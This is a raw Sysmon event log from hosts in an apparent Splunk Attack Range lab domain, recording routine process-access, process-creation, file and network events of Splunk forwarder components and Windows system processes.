08:11:51.638{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F947-60EB-1B7E-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.638{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F947-60EB-1B7E-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.624{466BC892-F947-60EB-1B7E-00000000CF01}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.607{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B962A8DE9BC080E90B9D2EBF70EF57E2,SHA256=54C0032EDB996274A0FD9AC76012E4753D4241E48CDF00CEB30DE4A71FCFD742,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811178Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:11:51.563{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBCE2F80269EA8B32F31836AC00A5C96,SHA256=53341BC0862F6B5E11D058CEF025A05601C24C5608A79CEEE27A06D181279B2D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.270{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4C94048CB5CDF99294CF7C795894158,SHA256=611282C1D0470B0F3D8681BE5CB1E757C1DCA0219F5A3AF685EB14A768F7EBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:51.270{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0CF21187B9F3DB473F0253037E3A40ED,SHA256=7FD05ACDF17CB2684A0772F3898058B1E01BBC9C918F60F4F2271F9F2B020819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.636{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4C94048CB5CDF99294CF7C795894158,SHA256=611282C1D0470B0F3D8681BE5CB1E757C1DCA0219F5A3AF685EB14A768F7EBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:52.621{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA1B9F09AA085537FE6397FB61F5F6C8,SHA256=079ABC9934F552EF72A06A99E9F27DF94F812D95E1CCCDB275FE8F573FFAB76A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811179Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:52.579{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B314881D99331F2DDC8DE8BDD9696DF,SHA256=2D31FDE37CDF2046FAD5863CD1F4E26E3A28FCDF1A17769C29D0E796F8F1808F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.583{466BC892-F948-60EB-1C7E-00000000CF01}71166724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001055883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:44.744{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62026-false10.0.1.12-8000- 10341000x80000000000000001055882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F948-60EB-1C7E-00000000CF01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:52.336{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F948-60EB-1C7E-00000000CF01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:52.336{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.336{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F948-60EB-1C7E-00000000CF01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055875Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:52.321{466BC892-F948-60EB-1C7E-00000000CF01}7116C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
10341000x80000000000000001055894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F949-60EB-1D7E-00000000CF01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:53.020{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:11:53.020{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F949-60EB-1D7E-00000000CF01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.020{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F949-60EB-1D7E-00000000CF01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:53.005{466BC892-F949-60EB-1D7E-00000000CF01}6064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000811180Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:51.212{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57522-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000-
